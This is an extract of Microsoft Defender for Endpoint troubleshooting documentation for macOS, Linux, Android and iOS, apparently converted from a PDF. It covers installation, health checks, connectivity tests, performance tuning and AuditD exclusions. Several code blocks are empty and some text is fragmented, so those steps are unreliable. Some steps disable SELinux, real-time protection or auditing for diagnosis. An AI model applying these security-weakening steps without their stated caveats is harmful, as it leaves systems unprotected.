6. From the JAMF portal, navigate to Configuration Profiles and select the Upload
button. Select com.microsoft.network-extension.signed.mobileconfig when
prompted for the file.
Feedback

Manage system extensions using the
manual methods of deployment
Article • 08/30/2023
This article describes the procedures involved when deploying Microsoft Defender for
Endpoint manually.
Manual deployment
System Extensions
You might see the prompt that's shown in the following screenshot:
1. Select OK. You might get a second prompt as shown in the following screenshot:

2. From this second-prompt screen, select OK. You'll receive a notification message
that reads Installation succeeded, as shown in the following screenshot:
3. On the screen displaying the Installation succeeded notification message, select

OK. You'll return to the following screen:

4. From the menu bar, click the x symbol on the shield. You'll get the options shown
in the following screenshot:
5. Select Action needed. The following screen appears:
6. Click Fix on the top-right corner of this screen. You'll get a prompt, as shown in the
following screenshot:

7. Enter your password and select OK.

8. Click
The System Preferences screen appears.


9. Click Security & Privacy. The Security & Privacy screen appears.

10. Select Click the lock to make changes. You'll get a prompt as shown in the
following screenshot:

11. Enter your password and click Unlock. The following screen appears:

12. Select Details, next to Some software system requires your attention before it
can be used.

13. Check both the Microsoft Defender checkboxes, and select OK. You'll get two
pop-up screens, as shown in the following screenshot:

14. On the "Microsoft Defender" Would like to Filter Network Content pop-up
screen, click Allow.
15. On the Microsoft Defender wants to make changes pop-up screen, enter your
password and select OK.
If you run systemextensionsctl list, the following screen appears:
Accessibility
1. On the Security & Privacy screen, select the Privacy tab.

2. Select Accessibility from the left navigation pane, and click +.


3. From the resultant screen, select Applications from the Favorites pane in the left-
side of the screen; select Microsoft Defender; and then select Open at the
bottom-right of the screen.
4. From the resultant screen, check the Microsoft Defender checkbox.


Full Disk Access

1. On the Security & Privacy screen, select the Privacy tab.
2. Select Full Disk Access from the left navigation pane, and then click the Lock icon.

3. Confirm that the Microsoft Defender extension has full disk access; if not, check the
Microsoft Defender checkbox.

Notifications
1. From the System Preferences home screen, select Notifications.

The Notifications screen appears.
2. Select Microsoft Defender from the left navigation pane.
3. Enable the Allow Notifications option; select Alerts, and retain the default settings
as is.

What a healthy system looks like
mdatp health output

Check the system extensions
In terminal, run the following command to check the system extensions:
systemextensionsctl list
The execution of this command is shown in the following screenshot:
Feedback

Troubleshoot installation issues for
Linux
Article • 02/21/2024
Applies to:

Verify that the installation succeeded

An error in installation might or might not result in a meaningful error message by the
package manager. To verify if the installation succeeded, obtain and check the
installation logs using:
Bash
sudo journalctl --no-pager|grep 'microsoft-mdatp' > installation.log
Bash
grep 'postinstall end' installation.log
Output
microsoft-mdatp-installer[102243]: postinstall end [2020-03-26

07:04:43OURCE +0000] 102216
An output from the previous command with correct date and time of installation
indicates success.
Also check the Client configuration to verify the health of the product and detect the
EICAR text file.
Make sure you have the correct package

Verify that the package you're installing matches the host distribution and version.
ﾉ Expand table
package distribution
mdatp-rhel8.Linux.x86_64.rpm Oracle, RHEL, and CentOS 8.x
mdatp-sles12.Linux.x86_64.rpm SUSE Linux Enterprise Server 12.x
mdatp-sles15.Linux.x86_64.rpm SUSE Linux Enterprise Server 15.x
mdatp.Linux.x86_64.rpm Oracle, RHEL, and CentOS 7.x
mdatp.Linux.x86_64.deb Debian and Ubuntu 16.04, 18.04 and 20.04
For manual deployment, make sure the correct distro and version are selected.
Installation failed due to dependency error

errors, you can manually download the prerequisite dependencies.
The mdatp RPM package requires glibc >= 2.17 , audit , policycoreutils ,
semanage , selinux-policy-targeted , mde-netfilter
For RHEL6 the mdatp RPM package requires audit , policycoreutils , libselinux ,
mde-netfilter
For DEBIAN the mdatp package requires libc6 >= 2.23 , uuid-runtime , auditd ,
mde-netfilter
For DEBIAN the mde-netfilter package requires libnetfilter-queue1 , libglib2.0-

0
For RPM the mde-netfilter package requires libmnl , libnfnetlink ,

libnetfilter_queue , glib2
Installation failed
Check if the Defender for Endpoint service is running:
Bash
Output
● mdatp.service - Microsoft Defender for Endpoint

Loaded: loaded (/lib/systemd/system/mdatp.service; enabled; vendor
preset: enabled)
Active: active (running) since Thu 2020-03-26 10:37:30 IST; 23h ago
Main PID: 1966 (wdavdaemon)
Tasks: 105 (limit: 4915)
CGroup: /system.slice/mdatp.service
├─1966 /opt/microsoft/mdatp/sbin/wdavdaemon
├─1967 /opt/microsoft/mdatp/sbin/wdavdaemon
└─1968 /opt/microsoft/mdatp/sbin/wdavdaemon
Steps to troubleshoot if the mdatp service isn't

running
1. Check to see if mdatp user exists:
Bash
id "mdatp"
If there's no output, run
Bash
sudo useradd --system --no-create-home --user-group --shell

/usr/sbin/nologin mdatp
2. Try enabling and restarting the service using:
Bash
sudo service mdatp start
Bash
sudo service mdatp restart

3. If mdatp.service isn't found upon running the previous command, run:
Bash
sudo cp /opt/microsoft/mdatp/conf/mdatp.service <systemd_path>
where <systemd_path> is /lib/systemd/system for Ubuntu and Debian distributions

and /usr/lib/systemd/system` for Rhel, CentOS, Oracle, and SLES. Then rerun step
2.
4. If the above steps don't work, check if SELinux is installed and in enforcing mode. If
so, try setting it to permissive (preferably) or disabled mode. It can be done by
setting the parameter SELINUX to permissive or disabled in /etc/selinux/config
file, followed by reboot. Check the man-page of selinux for more details. Now try
restarting the mdatp service using step 2. Revert the configuration change
immediately though for security reasons after trying it and reboot.
5. If /opt directory is a symbolic link, create a bind mount for /opt/microsoft .
6. Ensure that the daemon has executable permission.
Bash
ls -l /opt/microsoft/mdatp/sbin/wdavdaemon
Output
-rwxr-xr-x 2 root root 15502160 Mar 3 04:47

/opt/microsoft/mdatp/sbin/wdavdaemon
If the daemon doesn't have executable permissions, make it executable using:
Bash
sudo chmod 0755 /opt/microsoft/mdatp/sbin/wdavdaemon
and retry running step 2.
7. Ensure that the file system containing wdavdaemon isn't mounted with noexec .
If the Defender for Endpoint service is running,

but the EICAR text file detection doesn't work
1. Check the file system type using:
Bash
findmnt -T <path_of_EICAR_file>
Currently supported file systems for on-access activity are listed here. Any files
outside these file systems aren't scanned.
Command-line tool mdatp isn't working

1. If running the command-line tool mdatp gives an error command not found , run the
following command:
Bash
sudo ln -sf /opt/microsoft/mdatp/sbin/wdavdaemonclient /usr/bin/mdatp
and try again.
If none of the above steps help, collect the diagnostic logs:
Bash
Output
Diagnostic file created: <path to file>
Path to a zip file that contains the logs are displayed as an output. Reach out to
our customer support with these logs.
 Tip
Feedback

Article • 07/18/2023

The following table provides information on the values returned when you run the mdatp
health command and their corresponding descriptions.
ﾉ Expand table
Value Description
automatic_definition_update_enabled True if automatic antivirus definition updates are

enabled, false otherwise.
cloud_automatic_sample_submission_consent Current sample submission level. Can be one of

the following values:
None: No suspicious samples are submitted
to Microsoft.
Safe: Only suspicious samples that don't
contain personally identifiable information
(PII) are submitted automatically. This is the
default value for this setting.
All: All suspicious samples are submitted to
Microsoft.
cloud_diagnostic_enabled True if optional diagnostic data collection is

enabled, false otherwise. For more information
related to Defender for Endpoint and other
products and services like Microsoft Defender
Antivirus and Windows, see Microsoft Privacy
Statement .
cloud_enabled True if cloud-delivered protection is enabled, false

otherwise.
conflicting_applications List of applications that are possibly conflicting

with Microsoft Defender for Endpoint. This list
includes, but isn't limited to, other security
products and other applications known to cause
compatibility issues.
definitions_status Status of antivirus definitions.

Value Description
definitions_updated Date and time of last antivirus definition update.
definitions_updated_minutes_ago Number of minutes since last antivirus definition

update.
definitions_version Antivirus definition version.
edr_client_version Version of the EDR client running on the device.
edr_configuration_version EDR configuration version.
edr_device_tags List of tags associated with the device.
edr_group_ids Group ID that the device is associated with.
edr_machine_id Device identifier used in Microsoft Defender XDR.
engine_version Version of the antivirus engine.
healthy True if the product is healthy, false otherwise.
licensed True if the device is onboarded to a tenant, false

otherwise.
log_level Current log level for the product.
machine_guid Unique machine identifier used by the antivirus

component.
network_protection_status Status of the network protection component

(macOS only). Can be one of the following values:
starting - Network protection is starting
failed_to_start - Network protection
couldn't be started due to an error
started - Network protection is currently
running on the device
restarting - Network protection is currently
restarting
stopping - Network protection is stopping
stopped - Network protection isn't running
org_id Organization that the device is onboarded to. If

the device isn't yet onboarded to any
organization, this prints unavailable. For more
information on onboarding, see Onboard to
passive_mode_enabled True if the antivirus component is set to run in

passive mode, false otherwise.
Value Description
product_expiration Date and time when the current product version

reaches end of support.
real_time_protection_available True if the real-time protection component is

healthy, false otherwise.
real_time_protection_enabled True if real-time antivirus protection is enabled,

false otherwise.
real_time_protection_subsystem Subsystem used to serve real-time protection. If

real-time protection isn't operating as expected,
this prints unavailable.
release_ring Release ring. For more information, see

Deployment rings.
Component specific health

You can get more detailed health information for different Defender's features with
mdatp health --details <feature> . For example:
Bash
mdatp health --details edr
edr_early_preview_enabled : "disabled"
edr_device_tags : []
edr_group_ids : ""
edr_configuration_version : "20.199999.main.2022.10.25.03-
514032a834557bdd31ac415be6df278d9c2a4c25"
edr_machine_id :
"a47ba049f43319ac669b6291ce73275cd445c9cd"
edr_sense_guid : "298a1a8c-04dd-4929-8efd-
3bb14cb54b94"
edr_preferred_geo : "unitedstates"
You can run mdatp health --help on recent versions to list all supported feature s.
 Tip
Feedback

for Microsoft Defender for Endpoint on
Linux
Article • 07/18/2023
Applies to:

Run the connectivity test

To test if Defender for Endpoint on Linux can communicate to the cloud with the current
network settings, run a connectivity test from the command line:
Bash
Expected output:
Output
Testing connection with https://cdn.x.cp.wd.microsoft.com/ping ... [OK]

Testing connection with https://eu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://wu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://x.cp.wd.microsoft.com/api/report ... [OK]
Testing connection with https://winatp-gw-cus.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-eus.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-weu.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-neu.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-ukw.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-uks.microsoft.com/test ... [OK]
Testing connection with https://eu-v20.events.data.microsoft.com/ping ...
[OK]
Testing connection with https://us-v20.events.data.microsoft.com/ping ...
[OK]
Testing connection with https://uk-v20.events.data.microsoft.com/ping ...
[OK]
Testing connection with https://v20.events.data.microsoft.com/ping ... [OK]
If the connectivity test fails, check if the device has Internet access and if any of the
endpoints required by the product are blocked by a proxy or firewall.
Failures with curl error 35 or 60, indicate certificate pinning rejection. Check to see if the
connection is under SSL or HTTPS inspection. If so, add Microsoft Defender for Endpoint
to the allowlist.
Troubleshooting steps for environments

without proxy or with transparent proxy
To test that a connection isn't blocked in an environment without a proxy or with a
transparent proxy, run the following command in the terminal:
Bash

The output from this command should be similar to:
Output
Troubleshooting steps for environments with

static proxy
２ Warning
PAC, WPAD, and authenticated proxies are not supported. Ensure that only a static
proxy or transparent proxy is being used.
through data from Defender for Endpoint on Linux to the relevant URLs without
interception. Adding your interception certificate to the global store will not allow
for interception.
If a static proxy is required, add a proxy parameter to the above command, where
proxy_address:port correspond to the proxy address and port:
Bash
curl -x http://proxy_address:port -w ' %{url_effective}\n'

'https://x.cp.wd.microsoft.com/api/report'
Ensure that you use the same proxy address and port as configured in the
/lib/system/system/mdatp.service file. Check your proxy configuration if there are
errors from the above commands.
To set the proxy for mdatp, use the following command:
Bash
mdatp config proxy set --value http://address:port
Upon success, attempt another connectivity test from the command line:
Bash
If the problem persists, contact customer support.
Resources
For more information about how to configure the product to use a static proxy,
see Configure Microsoft Defender for Endpoint for static proxy discovery.
 Tip
Feedback
 Yes  No

Troubleshoot issues for Microsoft
Defender for Endpoint on Linux RHEL6
Article • 07/18/2023
Applies to:

） Important

This article provides guidance on how to troubleshoot issues you might encounter with
Microsoft Defender for Linux on Red Hat Linux 6 (RHEL 6) or higher.
After the package (mdatp_XXX.XX.XX.XX.x86_64.rpm) is installed, take actions provided

to verify that the installation was successful.
Check the service health

Use the following command to check the service health:
Bash
mdatp health
Verify that the service is running

Use the following command to verify that the service is running:
Bash
Expected output: mdatp start/running, process 4517
Verify the distribution and kernel version

The distribution and kernel versions should be on the supported list.
Use the following command to get the distribution version:
Bash
cat /etc/redhat-release (or /etc/system-release)
Use the following command to get the kernel version:
Bash
uname -r
Check if mdatp audisp process is running

The expected output is that the process is running.
Use the following command to check:
Bash
pidof mdatp_audisp_plugin
Check TALPA modules

There should be nine modules loaded.
Use the following command to check:
Bash
lsmod | grep talpa
Expected output: Enabled

Bash
talpa_pedconnector 878 0
talpa_pedevice 5189 2 talpa_pedconnector
talpa_vfshook 32300 1
talpa_vcdevice 4947 1
talpa_syscall 9127 0
talpa_core 90699 4 talpa_vfshook,talpa_vcdevice,talpa_syscall
talpa_linux 29424 5
talpa_vfshook,talpa_vcdevice,talpa_syscall,talpa_core
talpa_syscallhookprobe 882 0
talpa_syscallhook 14987 2 talpa_vfshook,talpa_syscallhookprobe
Bash
lsmod | grep talpa | wc -l
Expected output: 9
Check TALPA status

Bash
cat /proc/sys/talpa/interceptors/VFSHookInterceptor/status
Debug log files (apart from the 'mdatp diagnostic create' bundle)
Bash
/var/log/audit/audit.log
/var/log/messages
semanage fcontext -l > selinux.log
Performance and Memory
Bash
top -p <wdavdaemon pid>
pmap -x <wdavdaemon pid>
Where <wdavdaemon pid> can be found using pidof wdavdaemon .
 Tip
Feedback

Troubleshoot performance issues for
Linux
Article • 04/27/2023
Applies to:

This document provides instructions on how to narrow down performance issues related
to Defender for Endpoint on Linux using the available diagnostic tools to be able to
understand and mitigate the existing resource shortages and the processes that are
making the system into such situations. Performance problems are mainly caused by
bottlenecks in one or more hardware subsystems, depending on the profile of resource
utilization on the system. Sometimes applications are sensitive to disk I/O resources and
may need more CPU capacity, and sometimes some configurations are not sustainable,
and may trigger too many new processes, and open too many file descriptors.
Depending on the applications that you are running and your device characteristics, you
may experience suboptimal performance when running Defender for Endpoint on Linux.
In particular, applications or system processes that access many resources such as CPU,
Disk, and Memory over a short timespan can lead to performance issues in Defender for
Endpoint on Linux.
２ Warning
Before starting, please make sure that other security products are not currently
running on the device. Multiple security products may conflict and impact the host
performance.
Troubleshoot performance issues using Real-

time Protection Statistics
Applies to:
Only performance issues related to AV
Real-time protection (RTP) is a feature of Defender for Endpoint on Linux that

continuously monitors and protects your device against threats. It consists of file and
process monitoring and other heuristics.
The following steps can be used to troubleshoot and mitigate these issues:
1. Disable real-time protection using one of the following methods and observe
whether the performance improves. This approach helps narrow down whether
Defender for Endpoint on Linux is contributing to the performance issues.
If your device is not managed by your organization, real-time protection can be

disabled from the command line:
Bash
Output
If your device is managed by your organization, real-time protection can be

disabled by your administrator using the instructions in Set preferences for
７ Note
If the performance problem persists while real-time protection is off, the

origin of the problem could be the endpoint detection and response (EDR)
component. In this case please follow the steps from the Troubleshoot
performance issues using Microsoft Defender for Endpoint Client Analyzer
section of this article.
2. To find the applications that are triggering the most scans, you can use real-time
statistics gathered by Defender for Endpoint on Linux.
７ Note
This feature is available in version 100.90.70 or newer.
This feature is enabled by default on the Dogfood and InsiderFast channels. If

you're using a different update channel, this feature can be enabled from the
command line:
Bash
mdatp config real-time-protection-statistics --value enabled
This feature requires real-time protection to be enabled. To check the status of

real-time protection, run the following command:
Bash
Verify that the real_time_protection_enabled entry is true . Otherwise, run the

following command to enable it:
Bash
Output
To collect current statistics, run:
Bash
mdatp diagnostic real-time-protection-statistics --output json
７ Note
Using --output json (note the double dash) ensures that the output format is
ready for parsing.
The output of this command will show all processes and their associated scan
activity.
3. On your Linux system, download the sample Python parser high_cpu_parser.py
using the command:
Bash
wget -c https://raw.githubusercontent.com/microsoft/mdatp-
xplat/master/linux/diagnostic/high_cpu_parser.py
The output of this command should be similar to the following:
Output
--2020-11-14 11:27:27--
https://raw.githubusercontent.com/microsoft.mdatp-
xplat/master/linus/diagnostic/high_cpu_parser.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)...
151.101.xxx.xxx
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|
151.101.xxx.xxx| :443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1020 [text/plain]
Saving to: 'high_cpu_parser.py'
100%[===========================================>] 1,020 --.-K/s
in 0s
4. Next, type the following commands:
Bash
mdatp diagnostic real-time-protection-statistics --output json | python

high_cpu_parser.py
The output of the above is a list of the top contributors to performance issues. The
first column is the process identifier (PID), the second column is the process name,
and the last column is the number of scanned files, sorted by impact. For example,
the output of the command will be something like the below:
Output
... > mdatp diagnostic real-time-protection-statistics --output json |

python high_cpu_parser.py | head
27432 None 76703
73467 actool 1249
73914 xcodebuild 1081
73873 bash 1050
27475 None 836
1 launchd 407
73468 ibtool 344
549 telemetryd_v1 325
4764 None 228
125 CrashPlanService 164
To improve the performance of Defender for Endpoint on Linux, locate the one
with the highest number under the Total files scanned row and add an exclusion
for it. For more information, see Configure and validate exclusions for Defender for
Endpoint on Linux.
７ Note
The application stores statistics in memory and only keeps track of file activity
since it was started and real-time protection was enabled. Processes that were
launched before or during periods when real time protection was off are not
counted. Additionally, only events which triggered scans are counted.
5. Configure Microsoft Defender for Endpoint on Linux with exclusions for the
processes or disk locations that contribute to the performance issues and re-
enable real-time protection.
For more information, see Configure and validate exclusions for Microsoft
Troubleshoot performance issues using

Analyzer
Applies to:
Performance issues of all available Defender for Endpoint components such as AV

and EDR
The Microsoft Defender for Endpoint Client Analyzer (MDECA) can collect traces, logs,
and diagnostic information in order to troubleshoot performance issues on onboarded
devices on Linux.
７ Note
Microsoft Customer Support Services (CSS) to collect information such as (but
not limited to) IP addresses, PC names that will help troubleshoot issues you
may be experiencing with Microsoft Defender for Endpoint. For more
information about our privacy statement, see Microsoft Privacy Statement .
As a general best practice, it is recommended to update the Microsoft
Defender for Endpoint agent to latest available version and confirming that
the issue still persists before investigating further.
To run the client analyzer for troubleshooting performance issues, see Run the client
analyzer on macOS and Linux.
７ Note
In case after following the above steps, the performance problem persists, please
contact customer support for further instructions and mitigation.
Troubleshoot AuditD performance issues

Background:
Microsoft Defender for Endpoint on Linux OS distributions uses AuditD framework

to collect certain types of telemetry events.
System events captured by rules added to /etc/audit/rules.d/ will add to

audit.log(s) and might affect host auditing and upstream collection.
Events added by Microsoft Defender for Endpoint on Linux will be tagged with
mdatp key.
If the AuditD service is misconfigured or offline, then some events might be

missing. To troubleshoot such an issue, refer to: Troubleshoot missing events or
alerts issues for Microsoft Defender for Endpoint on Linux.
In certain server workloads, two issues might be observed:
High CPU resource consumption from mdatp_audisp_plugin process.
/var/log/audit/audit.log becoming large or frequently rotating.
These issues may occur on servers with many events flooding AuditD.
７ Note
As a best practice, we recommend to configure AuditD logs to rotate when the
maximum file size limit is reached.
This will prevent AuditD logs accumulating in a single file and the rotated log files
can be moved out to save disk space.
To achieve this, you can set the value for max_log_file_action to rotate in the
auditd.conf file.
This can happen if there are multiple consumers for AuditD, or too many rules with the
combination of Microsoft Defender for Endpoint and third party consumers, or high
workload that generates a lot of events.
To troubleshoot such issues, begin by collecting MDEClientAnalyzer logs on the sample

affected server.
７ Note
As a general best practice, it is recommended to update the Microsoft Defender

for Endpoint agent to latest available version and confirming issue still persists
before investigating further.
That there are additional configurations that can affect AuditD subsystem CPU
strain.
Specifically, in auditd.conf , the value for disp_qos can be set to "lossy" to reduce
the high CPU consumption.
However, this means that some events may be dropped during peak CPU
consumption.
XMDEClientAnalyzer
When you use XMDEClientAnalyzer, the following files will display output that provides
insights to help you troubleshoot issues.
auditd_info.txt
auditd_log_analysis.txt
auditd_info.txt
Contains general AuditD configuration and will display:
What processes are registered as AuditD consumers.
Auditctl -s output with enabled=2

Suggests auditd is in immutable mode (requires restart for any config changes
to take effect).
Auditctl -l output
Will show what rules are currently loaded into the kernel (which may be
different that what exists on disk in "/etc/auditd/rules.d/mdatp.rules").
Will show which rules are related to Microsoft Defender for Endpoint.
auditd_log_analysis.txt
Contains important aggregated information that is useful when investigating AuditD
performance issues.
Which component owns the most reported events (Microsoft Defender for
Endpoint events will be tagged with key=mdatp ).
The top reporting initiators.
The most common system calls (network or filesystem events, and others).
What file system paths are the noisiest.
To mitigate most AuditD performance issues, you can implement AuditD exclusion. If
the given exclusions do not improve the performance then we can use the rate limiter
option. This will reduce the number of events being generated by AuditD altogether.
７ Note
Exclusions should be made only for low threat and high noise initiators or paths.
For example, do not exclude /bin/bash which risks creating a large blind spot.
Common mistakes to avoid when defining exclusions.
Exclusion Types
The XMDEClientAnalyzer support tool contains syntax that can be used to add AuditD
exclusion configuration rules:
AuditD exclusion – support tool syntax help:


By initiator
-e/ -exe full binary path > Removes all events by this initiator
By path
-d / -dir full path to a directory > Removes filesystem events targeting this
directory
Examples:
If " /opt/app/bin/app " writes to " /opt/app/cfg/logs/1234.log ", then you can use the
support tool to exclude with various options:
-e /opt/app/bin/app
-d /opt/app/cfg
-x /usr/bin/python /etc/usercfg
-d /usr/app/bin/
More examples:
./mde_support_tool.sh exclude -p <process id>
./mde_support_tool.sh exclude -e <process name>
To exclude more than one item - concatenate the exclusions into one line:
./mde_support_tool.sh exclude -e <process name> -e <process name 2> -e <process

name3>
The -x flag is used to exclude access to subdirectories by specific initiators for example:
./mde_support_tool.sh exclude -x /usr/sbin/mv /tmp
The above will exclude monitoring of /tmp subfolder, when accessed by mv process.
Rate Limiter
The XMDEClientAnalyzer support tool contains syntax that can be used to limit the
number of events being reported by the auditD plugin. This option will set the rate limit
globally for AuditD causing a drop in all the audit events.
７ Note
This functionality should be carefully used as limits the number of events being
reported by the auditd subsystem as a whole. This could reduces the number of
events for other subscribers as well.
The ratelimit option can be used to enable/disable this rate limit.
Enable: ./mde_support_tool.sh ratelimit -e true
Disable: ./mde_support_tool.sh ratelimit -e false
When the ratelimit is enabled a rule will be added in AuditD to handle 2500 events/sec.
７ Note
Please contact Microsoft support if you need assistance with analyzing and
mitigating AuditD related performance issues, or with deploying AuditD exclusions
at scale.
See also
 Tip
Feedback

Troubleshoot missing events or alerts
issues for Microsoft Defender for
Endpoint on Linux
Article • 07/18/2023
Applies to:

This article provides some general steps to mitigate missing events or alerts in the
Microsoft Defender portal .
Once Microsoft Defender for Endpoint has been installed properly on a device, a device
page will be generated in the portal. You can review all recorded events in the timeline
tab in the device page, or in advanced hunting page. This section troubleshoots the case
of some or all expected events are missing. For instance, if all CreatedFile events are
missing.
Missing network and login events

Microsoft Defender for Endpoint utilized audit framework from linux to track network
and login activity.
1. Make sure audit framework is working.
Bash
service auditd status
expected output:
Output
● auditd.service - Security Auditing Service

Loaded: loaded (/usr/lib/systemd/system/auditd.service; enabled; vendor
preset: enabled)
Active: active (running) since Mon 2020-12-21 10:48:02 IST; 2 weeks 0
days ago
Docs: man:auditd(8)
https://github.com/linux-audit/audit-documentation
Process: 16689 ExecStartPost=/sbin/augenrules --load (code=exited,
status=1/FAILURE)
Process: 16665 ExecStart=/sbin/auditd (code=exited, status=0/SUCCESS)
Main PID: 16666 (auditd)
Tasks: 25
CGroup: /system.slice/auditd.service
├─16666 /sbin/auditd
├─16668 /sbin/audispd
├─16670 /usr/sbin/sedispatch
└─16671 /opt/microsoft/mdatp/sbin/mdatp_audisp_plugin -d
2. If auditd is marked as stopped, start it.
Bash
service auditd start
On SLES systems, SYSCALL auditing in auditd might be disabled by default and can be
accounted for missing events.
1. To validate that SYSCALL auditing is not disabled, list the current audit rules:
Bash
sudo auditctl -l
if the following line is present, remove it or edit it to enable Microsoft Defender for
Endpoint to track specific SYSCALLs.
Output
-a task, never
audit rules are located at /etc/audit/rules.d/audit.rules .
Missing file events

File events are collected with fanotify framework. In case some or all file events are
missing, make sure fanotify is enabled on the device and that the file system is
supported.
List the filesystems on the machine with:
Bash
df -Th
 Tip
Feedback

Troubleshooting issues on Microsoft
Defender for Endpoint on Android
Article • 09/29/2023
Applies to:

When onboarding a device, you might see sign in issues after the app is installed.
During onboarding, you might encounter sign in issues after the app is installed on your
device.
This article provides solutions to help address the sign-on issues.
Sign in failed - unexpected error

Sign in failed: Unexpected error, try later

Message:
Unexpected error, try later
Cause:
You have an older version of "Microsoft Authenticator" app installed on your device.
Solution:
Install latest version and of Microsoft Authenticator from Google Play Store and try
again.
Sign in failed - invalid license

Sign in failed: Invalid license, contact administrator

Message: Invalid license, contact administrator
Cause:
You don't have Microsoft 365 license assigned, or your organization doesn't have a
license for Microsoft 365 Enterprise subscription.
Solution:
Contact your administrator for help.
Report unsafe site

Phishing websites impersonate trustworthy websites for obtaining your personal or
financial information. Visit the Provide feedback about network protection page if you
want to report a website that could be a phishing site.
Phishing pages aren't blocked on some OEM

devices
Applies to: Specific OEMs only
Xiaomi
Phishing and harmful web threats detected by Defender for Endpoint for Android aren't
blocked on some Xiaomi devices. The following functionality doesn't work on these
devices.
Cause:
Xiaomi devices include a new permission model. This permission model prevents
Defender for Endpoint for Android from displaying pop-up windows while it runs in the
background.
Xiaomi devices permission: "Display pop-up windows while running in the background."

Solution:
Enable the required permission on Xiaomi devices.
Display pop-up windows while running in the background.
Unable to allow permission for 'Permanent

protection' during onboarding on some OEM
devices
Applies to: Specific OEM devices only.
Xiaomi
Defender App asks for Battery Optimization/Permanent Protection permission on

devices as part of app onboarding, and selecting Allow returns an error that the
permission couldn't be set. It only affects the last permission called "Permanent
Protection."
Cause:
Xiaomi changed the battery optimization permissions in Android 11. Defender for
Endpoint isn't allowed to configure this setting to ignore battery optimizations.
Solution:
1. Install MDE app in personal profile. (Sign-in isn't required.)

2. Open the Company Portal and tap on Settings.
3. Go to the Battery Optimization section, tap on the Turn Off button, and then select
on Allow to turn off Battery Optimization for the Company Portal.
4. Again, go to the Battery Optimization section and tap on the Turn On button. The
battery saver section opens.
5. Find the Defender app and tap on it.
6. Select No Restriction. Go back to the Defender app in work profile and tap on
Allow button.
7. The application shouldn't be uninstalled from personal profile for this to work.
７ Note
This is a temporary workaround. This can be used to unblock onboarding on

Xiaomi devices. The Defender team is working on a permanent fix. As the MDE app
is not onboarded in the personal profile, it will not have any visibility there.
Unable to use banking applications with MDE

app
Applies to: Banking apps like iMobile Pay (ICICI), PNB ONE.
Cause: Android allows apps in the personal profile to check if there's a VPN active on
the device, even outside of the personal profile. The banking app checks that and blocks
it in VPN work profiles only. The banking app doesn't work with any other VPN product.
Solution: Users need to disable MDE VPN from the Settings page. The following steps
can be used:
1. Go to Settings on the mobile device.

2. Search for VPN or open 'Network and Internet' and select on VPN.
3. Select on Microsoft Defender and select Disconnect.
Users should enable VPN when they're no longer using the banking app to ensure that
their devices are protected.
７ Note
This a temporary workaround. We are working on other alternatives to provide

users more control over the VPN settings from wihtin the app.
Send in-app feedback

If a user faces an issue, which isn't already addressed in the above sections or is unable
to resolve using the listed steps, the user can provide in-app feedback along with
diagnostic data. Our team can then investigate the logs to provide the right solution.
Users can follow these steps to do the same:
1. Open the MDE application on your device and select on the profile icon in the
top-left corner.
2. Select "Help & feedback".


3. Select "Send feedback to Microsoft".
4. Choose from the given options. To report an issue, select "I want to report an
issue".

5. Provide details of the issue that you're facing and check "Send diagnostic data".
We recommend checking "Include your email address" so that the team can reach
back to you with a solution or a follow-up.
6. Select on "Submit" to successfully send the feedback.
 Tip
Feedback
Troubleshoot issues and find answers to
FAQs on Microsoft Defender for
Endpoint on iOS
Article • 10/20/2023
Applies to:

７ Note
Control Filter not working as expected on Supervised devices Control Filter is not
working as expected from iOS 16.1 onwards. This has impacted the Web Protection
capability for Supervised devices without local loopback VPN. The issue has been
resolved with iOS 16.3. Support for Control Filter is re-enabled with the new version
- 1.1.38010102.
This topic provides troubleshooting information to help you address issues that may
arise as you use Microsoft Defender for Endpoint on iOS.
７ Note
Defender for Endpoint on iOS would use a VPN in order to provide the Web
Protection feature. This is not a regular VPN and is a local/self-looping VPN that
does not take traffic outside the device.
Apps don't work when VPN is turned on

There are some apps that stop functioning when an active VPN is detected. You can
disable the VPN during the time you're using such apps.
By default, Defender for Endpoint on iOS includes and enables the web protection
feature. Web protection helps to secure devices against web threats and protect users
from phishing attacks. Defender for Endpoint on iOS uses a VPN in order to provide this
protection. Note that this is a local VPN and unlike traditional VPN, network traffic isn't
sent outside the device.
While enabled by default, there might be some cases that require you to disable VPN.
For example, you want to run some apps that don't work when a VPN is configured. In
such cases, you can choose to disable the VPN directly from the Defender for Endpoint
app or using the following steps:
1. On your iOS device, open the Settings app, click or tap General and then VPN.
2. Click or tap the "i" button for Microsoft Defender for Endpoint.
3. Toggle off Connect On Demand to disable VPN.


７ Note
Web Protection will not be available when VPN is disabled. To re-enable Web
Protection, open the Microsoft Defender for Endpoint app on the device and
Enable Web Protection.
Coexistence with multiple VPN profiles

Apple iOS doesn't support multiple device-wide VPNs to be active simultaneously.
While multiple VPN profiles can exist on the device, only one VPN can be active at a
time. If you need to use another VPN on the device, you can disable Defender for
Endpoint VPN while you're using the other VPN.
Battery consumption
In order to provide you all-time protection from web-based threats, Microsoft Defender
for Endpoint needs to run in the background at all times. This might lead to a minor
increase in overall battery consumption of your device. In case you're seeing significant
battery drain, send us feedback and we'll investigate.
Also, in the Settings app, iOS only shows battery usage of apps that are visible to the
user for a specific duration of time. The battery usage by apps shown on the screen is
only for that time duration and is computed by iOS based on a multitude of factors,
including CPU and Network usage. Microsoft Defender for Endpoint uses a local/loop-
back VPN in the background to check web traffic for any malicious websites or
connections. Network packets from any app go through this check and that causes the
battery usage of Microsoft Defender for Endpoint to be computed inaccurately. The
actual battery consumption of Microsoft Defender for Endpoint is lesser than what is
shown on the Battery Settings page on the device.
Note that the VPN used is a local VPN and unlike a traditional VPN, network traffic isn't
sent outside the device.
Data usage
Microsoft Defender for Endpoint uses a local/loopback VPN to check web traffic for any
malicious websites or connections. Due to this reason, Microsoft Defender for Endpoint
data usage can be inaccurately accounted for. We've also observed that if the device is
on cellular network only, the data usage reported by service provider is very close to the
actual consumption whereas in the Settings app, the numbers can be inaccurate.
We've similar observations with other VPN services as well.

In addition, it's critical for Microsoft Defender for Endpoint to be up to date with our
backend services to provide better protection.
Report unsafe site

